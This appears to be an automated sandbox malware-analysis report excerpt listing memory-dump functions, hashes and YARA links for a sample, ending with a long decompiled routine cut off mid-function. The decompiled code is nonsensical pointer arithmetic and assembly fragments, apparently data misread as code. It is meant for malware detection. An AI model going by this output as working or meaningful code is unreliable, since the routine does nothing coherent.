Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01761e1b538d18ee6a87ac61cc854277f0bd8c12c4150b6b039cbe5cdfce81fa
Instruction ID: b14a9ac9fa3fd8fd4ee8de36de598b4adf08d55b56365c8f40cacdd2e4b539c2
Opcode Fuzzy Hash: 01761e1b538d18ee6a87ac61cc854277f0bd8c12c4150b6b039cbe5cdfce81fa
Instruction Fuzzy Hash: 1B11E2F1B11211CFCB24CB2CD549BE9BBA2FB853A0F1585A6E506DB251DB70DC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 075D773A Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4283a13e83eb108a1bc2e1e11fc3fc79829f30e1a108c890e96a121e1f669768
Instruction ID: f6e42d7fc8e320cef403bb611c18adb81d692ea1c5ffd8f89f3ce4b686a3146c
Opcode Fuzzy Hash: 4283a13e83eb108a1bc2e1e11fc3fc79829f30e1a108c890e96a121e1f669768
Instruction Fuzzy Hash: A30149B63142100F8B385ABD98454AF33EAEFC91687100D3AE605CB758EF31DC0183E0

Uniqueness

Uniqueness Score: -1.00%

Function 075D7740 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d657aa13c4a6ba37b5cb0ce992fc23a6ff5fd257740a1a4fcf8131b4eea3e430
Instruction ID: 62807440f1bdb8226a6c65e0d474329ba404802b2d6206c91ef954e512122045
Opcode Fuzzy Hash: d657aa13c4a6ba37b5cb0ce992fc23a6ff5fd257740a1a4fcf8131b4eea3e430
Instruction Fuzzy Hash: F701F5B63112154F8B389ABD98549AF32EAAFD9158710093AA605CB758EF31DC0183E0

Uniqueness

Uniqueness Score: -1.00%

Function 075D55A8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b87359dd328cb2bc339f2ae0d634b2ccb05484fdd8d51e4587e5dc64e16f71
Instruction ID: 398c09a583d2e9f6d5256e59037f411b37a70e793076ecb37296f57a1199b8a7
Opcode Fuzzy Hash: f9b87359dd328cb2bc339f2ae0d634b2ccb05484fdd8d51e4587e5dc64e16f71
Instruction Fuzzy Hash: 0001ADB1D182588BEB29CF6BD8046EEBBF3BFCA300F04C03AD41467250EB740A15CA95

Uniqueness

Uniqueness Score: -1.00%

Function 075D0E42 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfca5c99595590f1d5721bf3ee90c85d0a37fd1195fde77c55f8851dcef356c0
Instruction ID: ed02b515574528ffb56c895660c1910da0aaf0483219fd1ed078d94ce2a24490
Opcode Fuzzy Hash: cfca5c99595590f1d5721bf3ee90c85d0a37fd1195fde77c55f8851dcef356c0
Instruction Fuzzy Hash: DCF0BEB304E2C85FDB134BA4AC214917F30FB27311B4849CBF889CB5E3E2668920E752

Uniqueness

Uniqueness Score: -1.00%

Function 075D76F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01950531c1f60476733c19e4b26bac58a65469a2768584955b36a2fdbbed4d69
Instruction ID: 220dbcc646f6195dc91372500063d9abdba29cb81562e1b3dea6360aca2c94c6
Opcode Fuzzy Hash: 01950531c1f60476733c19e4b26bac58a65469a2768584955b36a2fdbbed4d69
Instruction Fuzzy Hash: 80E0D83100C3040ECB0AA774BD1A0D53FA4D783364B959C46D0048E647FEA4E6459299

Uniqueness

Uniqueness Score: -1.00%

Function 075DBCEA Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9904204e615d1dcc3f65cab16501764e37234ef521337b1c81a9f6f41eda470
Instruction ID: d6873b0f625c98ccb073e2cb4430e21569cfd3206f5b3ede4557f2919ffdc86e
Opcode Fuzzy Hash: e9904204e615d1dcc3f65cab16501764e37234ef521337b1c81a9f6f41eda470
Instruction Fuzzy Hash: 5EE039B480929ECBDB219FA8D841B98BA71BB02310F0586A9D81557246E73058808F21

Uniqueness

Uniqueness Score: -1.00%

Function 075D14C7 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc7279c029b11f71beaca9e5ad26dcfd7b3a32c3f57d1f8090ac25ffce3e9ba
Instruction ID: 0b21222b29b6d1282eb13db8b3687490efe667bdc84f4e6f04763be59eba2e7a
Opcode Fuzzy Hash: 5bc7279c029b11f71beaca9e5ad26dcfd7b3a32c3f57d1f8090ac25ffce3e9ba
Instruction Fuzzy Hash: 73E08CB165D38A4EDB614BB4A45CA917FA0AB12161F0A81A7D010CB183E921895ACB26

Uniqueness

Uniqueness Score: -1.00%

Function 075D562E Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003e449b96d1cb39d3a83d3cd85299a3149598479a2ecd35d6f71929d13ec35d
Instruction ID: a5d804ab4735e0d0e12c9cd117c666772adf252474a49666be81f86ce526f64a
Opcode Fuzzy Hash: 003e449b96d1cb39d3a83d3cd85299a3149598479a2ecd35d6f71929d13ec35d
Instruction Fuzzy Hash: 2CE024B8E14258CFCB10CFE8E58089CBBB1BF09340F249829E812AB308E7306D06CF04

Uniqueness

Uniqueness Score: -1.00%

Function 075D14D8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2711fbd1fb963ba16984a98801e2882b428c835ff25984c88a0f1873f43ee2de
Instruction ID: 1141f441fcfb95473f5cfb209a21825687ce692fc1abd7018f90b322fa79bccf
Opcode Fuzzy Hash: 2711fbd1fb963ba16984a98801e2882b428c835ff25984c88a0f1873f43ee2de
Instruction Fuzzy Hash: D8D0C9B065030E9BDBA05B75E80C6657ED8BB00251F459136A8158A251EA71D890DA60

Uniqueness

Uniqueness Score: -1.00%

Function 075D7700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7c86460398f36f68d8c97d4c35f1b69e7aaa0f1bd04ee994640732acc9e153
Instruction ID: 91e07ccab47c6c16680c13c990124223a193dbd1f38b050fc43d0a3f0c44b01f
Opcode Fuzzy Hash: fe7c86460398f36f68d8c97d4c35f1b69e7aaa0f1bd04ee994640732acc9e153
Instruction Fuzzy Hash: 69C012310186094EC645FBB1ED4A455335A9B82348780C920A1054A619FF75D504569A

Uniqueness

Uniqueness Score: -1.00%

Function 075D576F Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad9bfb0354cd58eb1de7ddeca4d5ad8a75a63a8c5d3e7b2e6ad3f822ef1bab2
Instruction ID: ad647fd2e09d8fa684bb90a2f73db389cdce29d09fdcc5dc485396177e16ed5f
Opcode Fuzzy Hash: 2ad9bfb0354cd58eb1de7ddeca4d5ad8a75a63a8c5d3e7b2e6ad3f822ef1bab2
Instruction Fuzzy Hash: 82C012B8C04248CB8B00CFE8CC5008DB3B0BA04300B8415A1CC22AF308E3701900AB88

Uniqueness

Uniqueness Score: -1.00%

Function 075D5650 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f34874db3befd71d949f32ae8237150c7ab8894e92f1e64f57c9615c1335bd1
Instruction ID: 4d9364fa7c52ae7d20e7c33427e24e214a0e533e957dee5f5e7b2002ecc0b7c0
Opcode Fuzzy Hash: 8f34874db3befd71d949f32ae8237150c7ab8894e92f1e64f57c9615c1335bd1
Instruction Fuzzy Hash: B6D0C2B8D24319DFCB10CFE8D54449CBBF1BB59340F145426940AAB210E7305D10CB14

Uniqueness

Uniqueness Score: -1.00%

Function 075D5618 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3410f8b7e8cd5d29f95de0ee66100f591a59cdc5c9edc0c527ee6260460e7bf4
Instruction ID: 44264fdf0480f865383ebb088b25ffecab845f3e13e88ba8fc7f684dbff7dc75
Opcode Fuzzy Hash: 3410f8b7e8cd5d29f95de0ee66100f591a59cdc5c9edc0c527ee6260460e7bf4
Instruction Fuzzy Hash: A8D0C2B8D25219EFCF10CFA8E5848DCBBB1BB1A680F105415F852A7200E7305910CA14

Uniqueness

Uniqueness Score: -1.00%

Function 075D0E50 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70e995c30ca6a6606eab0416fb6651223ef2614283ac636aa43af77ae02f86d
Instruction ID: d8f331fb10ed6d4dff5cc5d1dd6cffb9a069b75090649d7bb51c64fc7bd85233
Opcode Fuzzy Hash: e70e995c30ca6a6606eab0416fb6651223ef2614283ac636aa43af77ae02f86d
Instruction Fuzzy Hash: C9C0023605020DBFCF069FC1EC05EDA7F2AFB08750F048401FA19141A287B39570ABA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0096BA77 Relevance: .7, Instructions: 669
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0096BA77(signed int __eax, void* __ebx, signed char __ecx, signed char __edx, signed char __edi, signed int __esi) {
				signed char _t119;
				signed char* _t120;
				signed char _t122;
				signed char _t123;
				signed char _t125;
				signed char _t126;
				signed char _t128;
				signed char _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t136;
				signed char _t137;
				signed char _t138;
				signed char _t139;
				signed char _t140;
				signed char _t141;
				signed int _t142;
				signed char _t143;
				signed char _t144;
				signed char _t145;
				signed int _t146;
				intOrPtr* _t147;
				intOrPtr* _t150;
				signed char _t151;
				signed char _t152;
				signed char _t153;
				signed char _t154;
				signed char _t155;
				signed int _t156;
				signed char _t157;
				signed char _t158;
				signed char _t159;
				signed char _t160;
				signed char _t161;
				signed char _t162;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				signed char _t171;
				signed char _t174;
				signed char _t175;
				signed char _t176;
				signed char _t177;
				signed char _t180;
				signed char _t181;
				signed char _t184;
				signed char _t185;
				signed char _t188;
				signed char _t189;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed int _t198;
				signed char _t204;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t209;
				signed char _t210;
				signed char _t212;
				signed char _t213;
				signed char _t214;
				signed char _t216;
				signed char _t231;
				signed char _t232;
				void* _t234;
				void* _t235;
				void* _t236;
				signed char _t237;
				signed char _t238;
				void* _t240;
				void* _t241;
				signed char _t242;
				void* _t244;
				void* _t245;
				void* _t246;
				signed char _t250;
				signed char _t256;
				signed char _t260;
				signed char _t261;
				signed int _t262;
				signed int _t263;
				signed char* _t264;

				_t262 = __esi;
				_t261 = __edi;
				_t260 = __edx;
				_t256 = __ecx;
				_t119 = __eax |  *__eax;
				_t231 = __ebx +  *((intOrPtr*)(__ebx - 0x4f));
				 *_t119 =  *_t119 + _t119;
				_t120 = _t119 + 0x19;
				_pop(ds);
				if(_t120 >= 0) {
					L18:
					 *_t260 =  *_t260 + _t256;
					 *_t260 =  &(_t120[ *_t260]);
					__eflags =  *_t260;
					while(1) {
						L19:
						_t232 = _t231 +  *((intOrPtr*)(_t231 - 0x4f));
						__eflags = _t232;
						 *_t120 =  &(_t120[ *_t120]);
						asm("outsd");
						_t122 = _t263;
						_t263 =  &(_t120[0x16]);
						 *_t122 =  *_t122 + _t122;
						_t123 = _t122 |  *_t122;
						 *_t123 =  *_t123 + _t123;
						asm("outsd");
						_t125 = _t261;
						_t261 = _t123 + 0x17;
						 *_t125 =  *_t125 + _t125;
						_t126 = _t125 |  *_t125;
						_t234 = _t232 +  *((intOrPtr*)(_t232 - 0x4f)) +  *((intOrPtr*)(_t232 +  *((intOrPtr*)(_t232 - 0x4f)) - 0x4f));
						 *_t126 =  *_t126 + _t126;
						asm("cld");
						_t128 = _t126 + 0x20 +  *((intOrPtr*)(_t126 + 0x20));
						 *_t128 =  *_t128 + _t128;
						_t129 = _t260;
						_t260 = _t128;
						 *_t129 =  *_t129 + _t129;
						 *((intOrPtr*)(_t234 + 0x34)) =  *((intOrPtr*)(_t234 + 0x34)) + _t260;
						 *_t129 =  *_t129 + _t129;
						_t256 = _t256 |  *(_t261 + 0x35);
						 *_t129 =  *_t129 + _t129;
						_t130 = _t129 |  *_t129;
						_t231 = _t234 +  *((intOrPtr*)(_t234 - 0x4f));
						__eflags = _t231;
						L21:
						while(__eflags == 0) {
							 *_t130 =  *_t130 + _t130;
							_t130 = _t130 + 0x1b;
							asm("outsd");
							__eflags = _t130;
							 *_t260 =  *_t260 + _t256;
							 *_t260 =  *_t260 + _t130;
							__eflags =  *_t260;
							if( *_t260 != 0) {
								goto L15;
							} else {
								 *_t130 =  *_t130 + _t130;
								asm("outsd");
								_t136 = _t130 + 0x1b;
								__eflags = _t136;
								while(1) {
									 *_t136 =  *_t136 + _t136;
									_t137 = _t136 |  *_t136;
									_t231 = _t231 +  *((intOrPtr*)(_t231 - 0x5f));
									 *_t137 =  *_t137 + _t137;
									_t120 = _t137 + 0x17;
									asm("outsd");
									__eflags =  *_t120 - _t120;
									 *_t260 =  *_t260 + _t256;
									 *_t260 =  &(_t120[ *_t260]);
									__eflags =  *_t260;
									if( *_t260 != 0) {
										goto L19;
									}
									 *_t120 =  &(_t120[ *_t120]);
									_t138 =  &(_t120[0x1f]);
									asm("adc [edi+0x73], ch");
									 *_t138 =  *_t138 + _t138;
									_t139 = _t138 |  *_t138;
									_t237 = _t231 +  *((intOrPtr*)(_t231 - 0x5f));
									__eflags = _t237;
									while(1) {
										 *_t139 =  *_t139 + _t139;
										_t140 = _t139 + 0x20;
										asm("movsd");
										 *_t140 =  *_t140 + _t140;
										 *_t256 =  *_t256 + _t237;
										__eflags =  *_t256;
										if(__eflags >= 0) {
											goto L32;
										}
										L27:
										 *_t140 =  *_t140 + _t140;
										_t256 = _t256 |  *(_t261 + 0x32);
										 *_t140 =  *_t140 + _t140;
										_t216 = _t140 |  *_t140;
										_t231 = _t237 +  *((intOrPtr*)(_t237 - 0x5f));
										 *_t216 =  *_t216 + _t216;
										_t136 = _t216 + 0x72;
										asm("int 0x19");
										_t41 = _t136 + 0x6f;
										 *_t41 =  *(_t136 + 0x6f) + _t260;
										__eflags =  *_t41;
										if(__eflags < 0) {
											 *_t260 =  *_t260 + _t256;
											 *_t260 =  *_t260 + _t136;
											__eflags =  *_t260;
											if( *_t260 != 0) {
												goto L31;
											} else {
												 *_t136 =  *_t136 + _t136;
												asm("outsd");
												_t142 = _t136 + 0x1b;
												 *_t142 =  *_t142 + _t142;
												__eflags =  *_t142;
												L46:
												 *_t260 =  *_t260 + _t256;
												 *_t260 =  *_t260 + _t142;
												__eflags =  *_t260;
												if(__eflags != 0) {
													if(__eflags >= 0) {
														goto L41;
													} else {
														 *_t142 =  *_t142 + _t142;
														_t256 = _t256 |  *(_t261 + 0x35);
														 *_t142 =  *_t142 + _t142;
														_t237 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
														__eflags = _t237;
														goto L36;
													}
												} else {
													 *_t142 =  *_t142 + _t142;
													_t150 = _t142 + 0x17;
													asm("outsd");
													__eflags =  *_t150 - _t150;
													 *_t260 =  *_t260 + _t256;
													 *_t260 =  *_t260 + _t150;
													__eflags =  *_t260;
													if( *_t260 != 0) {
														L36:
														_t139 =  *0x18040000;
														asm("outsd");
														__eflags = _t139;
														 *_t260 =  *_t260 + _t256;
														 *_t260 =  *_t260 + _t139;
														__eflags =  *_t260;
														if( *_t260 != 0) {
															 *_t139 =  *_t139 + _t139;
															_t140 = _t139 + 0x20;
															asm("movsd");
															 *_t140 =  *_t140 + _t140;
															 *_t256 =  *_t256 + _t237;
															__eflags =  *_t256;
															if(__eflags >= 0) {
																goto L32;
															}
														} else {
															 *_t139 =  *_t139 + _t139;
															_t144 = _t139 + 0x72;
															__eflags = _t144;
															asm("in eax, dx");
															asm("sbb [eax], al");
															if(_t144 < 0) {
																goto L52;
															} else {
																__eflags = _t144 - 0xa0000;
																goto L39;
															}
														}
													} else {
														 *_t150 =  *_t150 + _t150;
														_t143 = _t150 + 0x20;
														__eflags =  *_t143 & 0x00000000;
														 *_t261 =  *_t261 + _t238;
														_t51 = _t238 + 0x31;
														 *_t51 =  *(_t238 + 0x31) | _t262;
														__eflags =  *_t51;
														 *_t143 =  *_t143 ^ _t143;
														 *_t260 =  *_t260 + _t256;
														asm("outsd");
														_t144 = _t143 ^  *_t143;
														 *_t260 =  *_t260 + _t256;
														 *_t260 =  *_t260 + _t144;
														__eflags =  *_t260;
														if( *_t260 != 0) {
															L39:
															 *_t144 =  *_t144 + _t144;
															_t145 = _t144 |  *_t144;
															_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
															 *_t145 =  *_t145 + _t145;
															_t142 = _t145 + 0x17;
															__eflags = _t142;
															asm("outsd");
															if (_t142 <= 0) goto L40;
															 *_t260 =  *_t260 + _t256;
															 *_t260 =  *_t260 + _t142;
															__eflags =  *_t260;
															L41:
															_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
															__eflags = _t231;
														} else {
															 *_t144 =  *_t144 + _t144;
															_t146 = _t144 + 0x72;
															__eflags = _t146;
															asm("out dx, eax");
															asm("sbb [eax], eax");
															if(_t146 < 0) {
																L64:
																_t147 = _t146 + 0x17;
																asm("outsd");
																__eflags =  *_t147 - _t147;
																 *_t260 =  *_t260 + _t256;
																 *_t260 =  *_t260 + _t147;
																__eflags =  *_t260;
																if( *_t260 != 0) {
																	 *_t147 =  *_t147 + _t147;
																	_t142 = _t147 + 0x19;
																	asm("outsd");
																	__eflags = _t142;
																	 *_t260 =  *_t260 + _t256;
																	 *_t260 =  *_t260 + _t142;
																	__eflags =  *_t260;
																	if( *_t260 != 0) {
																		goto L46;
																	} else {
																		 *_t142 =  *_t142 + _t142;
																		__eflags =  *_t142;
																		goto L56;
																	}
																} else {
																	 *_t147 =  *_t147 + _t147;
																	_t151 = _t147 + 0x1f;
																	asm("adc [edi+0x73], ch");
																	 *_t151 =  *_t151 + _t151;
																	_t142 = _t151 |  *_t151;
																	_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																	__eflags = _t231;
																	L66:
																	if(__eflags != 0) {
																		L56:
																		 *(_t260 + _t262 * 2) =  *(_t260 + _t262 * 2) + _t142;
																		_t136 = _t256;
																		_t256 = _t142;
																		asm("sbb [eax], eax");
																		_t60 = _t136 + 0x6f;
																		 *_t60 =  *(_t136 + 0x6f) + _t260;
																		__eflags =  *_t60;
																	} else {
																		 *_t142 =  *_t142 + _t142;
																		_t152 = _t142 + 0x19;
																		asm("sbb [ebx+0x31], esi");
																		 *_t152 =  *_t152 + _t152;
																		_t256 = _t256 |  *(_t261 + 0x32);
																		 *_t152 =  *_t152 + _t152;
																		_t153 = _t152 |  *_t152;
																		_t238 = _t231 +  *((intOrPtr*)(_t231 - 0x5d));
																		 *_t153 =  *_t153 + _t153;
																		_t154 = _t153 + 0x72;
																		asm("adc [edx], ebx");
																		_t69 = _t154 + 0x6f;
																		 *_t69 =  *(_t154 + 0x6f) + _t260;
																		__eflags =  *_t69;
																		if(__eflags < 0) {
																			 *_t260 =  *_t260 + _t256;
																			 *_t260 =  *_t260 + _t154;
																			__eflags =  *_t260;
																			if( *_t260 != 0) {
																				goto L71;
																			} else {
																				 *_t154 =  *_t154 + _t154;
																				asm("outsd");
																				_t212 = _t154 + 0x1b;
																				 *_t212 =  *_t212 + _t212;
																				_t160 = _t212 |  *_t212;
																				_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
																				__eflags = _t231;
																				goto L83;
																			}
																		} else {
																			_t156 = _t154 ^  *_t154;
																			 *_t260 =  *_t260 + _t256;
																			 *_t260 =  *_t260 + _t156;
																			__eflags =  *_t260;
																			if( *_t260 != 0) {
																				 *_t156 =  *_t156 + _t156;
																				__eflags =  *_t156;
																				_push(es);
																				if( *_t156 >= 0) {
																					goto L73;
																				} else {
																					 *_t156 =  *_t156 + _t156;
																					_t256 = _t256 |  *(_t261 + 0x3c);
																					 *_t156 =  *_t156 + _t156;
																					_t213 = _t156 |  *_t156;
																					_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																					 *_t213 =  *_t213 + _t213;
																					_t154 = _t213 + 0x1a;
																					__eflags = _t154;
																					goto L63;
																				}
																			} else {
																				 *_t156 =  *_t156 + _t156;
																				_t214 = _t156 + 0x18;
																				asm("sbb [esi], edx");
																				asm("sbb [ebx+0x3a], esi");
																				 *_t214 =  *_t214 + _t214;
																				_t256 = _t256 |  *(_t261 + 0x3b);
																				 *_t214 =  *_t214 + _t214;
																				_t154 = _t214 |  *_t214;
																				__eflags = _t154;
																				L71:
																				 *_t260 =  *_t260 + _t154;
																				__eflags =  *_t260;
																				if( *_t260 != 0) {
																					L63:
																					asm("outsd");
																					_t155 = _t154 + 1;
																					 *_t155 =  *_t155 + _t155;
																					_t146 = _t155 |  *_t155;
																					_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																					 *_t146 =  *_t146 + _t146;
																					__eflags =  *_t146;
																					goto L64;
																				} else {
																					 *_t154 =  *_t154 + _t154;
																					_t156 = _t154 + 0x1f;
																					_t238 = _t238 - 1;
																					_pop(ds);
																					asm("sbb eax, 0x3473");
																					L73:
																					 *_t260 =  *_t260 + _t256;
																					asm("outsd");
																					_t142 = _t156 ^ 0x000a0000;
																					_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																					 *_t142 =  *_t142 + _t142;
																					__eflags =  *_t142;
																					L74:
																					 *((intOrPtr*)(_t261 + _t260)) =  *((intOrPtr*)(_t261 + _t260)) + _t142;
																					asm("outsd");
																					__eflags = _t142;
																					 *_t260 =  *_t260 + _t256;
																					 *_t260 =  *_t260 + _t142;
																					__eflags =  *_t260;
																					if(__eflags != 0) {
																						goto L66;
																					} else {
																						 *_t142 =  *_t142 + _t142;
																						_t157 = _t142 + 0x72;
																						__eflags = _t157;
																						asm("aaa");
																						asm("sbb [eax], eax");
																						if(_t157 < 0) {
																							L88:
																							asm("sbb [ecx], bl");
																							asm("sbb [ebx+0x3a], esi");
																							 *_t157 =  *_t157 + _t157;
																							 *_t157 =  *_t157 + _t157;
																							_t158 = _t157 |  *_t157;
																							 *_t158 =  *_t158 + _t158;
																							_t159 = _t158 + 0x1f;
																							_t231 = _t231 +  *((intOrPtr*)(_t231 - 0x5c)) - 1;
																							ds = ss;
																							asm("sbb eax, 0x3473");
																							_t256 = _t256 |  *(_t261 + 0x3b) |  *(_t261 + 0x35);
																							 *_t159 =  *_t159 + _t159;
																							_t160 = _t159 |  *_t159;
																							__eflags = _t160;
																							L89:
																							 *_t260 =  *_t260 + _t160;
																							__eflags =  *_t260;
																							if( *_t260 != 0) {
																								L83:
																								 *_t160 =  *_t160 + _t160;
																								_t142 = _t160 + 0x17;
																								asm("outsd");
																								__eflags =  *_t142 - _t142;
																								 *_t260 =  *_t260 + _t256;
																								 *_t260 =  *_t260 + _t142;
																								__eflags =  *_t260;
																								if( *_t260 != 0) {
																									goto L74;
																								} else {
																									goto L84;
																								}
																							} else {
																								 *_t160 =  *_t160 + _t160;
																								__eflags =  *_t160;
																								L91:
																								_t85 = _t262 + _t260;
																								 *_t85 =  *(_t262 + _t260) + _t160;
																								__eflags =  *_t85;
																								_t142 = _t160 + 0x16;
																								asm("outsd");
																								__eflags = _t142;
																								 *_t260 =  *_t260 + _t256;
																								 *_t260 =  *_t260 + _t142;
																								__eflags =  *_t260;
																								if( *_t260 != 0) {
																									L84:
																									 *_t142 =  *_t142 + _t142;
																									_t161 = _t142 + 0x1f;
																									_push(_t264);
																									asm("sbb [ebx+0x31], esi");
																									 *_t161 =  *_t161 + _t161;
																									_t256 = _t256 |  *(_t261 + 0x32);
																									 *_t161 =  *_t161 + _t161;
																									_t162 = _t161 |  *_t161;
																									_t241 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
																									 *_t162 =  *_t162 + _t162;
																									_t165 = _t162 + 0x00000072 - 0x6f70001a ^  *(_t162 + 0x72 - 0x6f70001a);
																									__eflags = _t165;
																									goto L85;
																								} else {
																									 *_t142 =  *_t142 + _t142;
																									_t167 = _t142 + 0x72;
																									__eflags = _t167;
																									asm("popad");
																									asm("sbb [eax], eax");
																									if(_t167 < 0) {
																										L105:
																										 *_t167 =  *_t167 + _t167;
																										_t168 = _t167 |  *_t167;
																										_t242 = _t238 +  *((intOrPtr*)(_t238 - 0x6b));
																										__eflags = _t242;
																									} else {
																										__eflags = _t167 - 0xa0000;
																										_t241 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
																										 *_t167 =  *_t167 + _t167;
																										_t165 = _t167 + 0x17;
																										__eflags = _t165;
																										_pop(ss);
																										asm("outsd");
																										if (__eflags <= 0) goto L96;
																										 *_t260 =  *_t260 + _t256;
																										 *_t260 =  *_t260 + _t165;
																										__eflags =  *_t260;
																										if( *_t260 != 0) {
																											L85:
																											 *_t165 =  *_t165 + _t165;
																											_t166 = _t165 |  *_t165;
																											_t231 = _t241 +  *((intOrPtr*)(_t241 - 0x5c));
																											__eflags = _t231;
																										} else {
																											 *_t165 =  *_t165 + _t165;
																											 *_t262 =  *_t262 + 1;
																											_t166 = _t165 + 0x00000002 | 0x73060001;
																											__eflags = _t166;
																											if (_t166 > 0) goto L98;
																											 *_t260 =  *_t260 + _t256;
																											__eflags =  *_t260;
																											asm("outsd");
																											if ( *_t260 < 0) goto L99;
																											 *_t260 =  *_t260 + _t256;
																											 *_t260 =  *_t260 + _t166;
																											__eflags =  *_t260;
																											if( *_t260 != 0) {
																												_t157 = _t166 + 0x18;
																												__eflags = _t157;
																												goto L88;
																											} else {
																												 *_t166 =  *_t166 + _t166;
																												_t204 = _t166 + 0x6f;
																												_t256 = _t256 + 1;
																												 *_t204 =  *_t204 + _t204;
																												_t160 = _t204 |  *_t260;
																												__eflags = _t160;
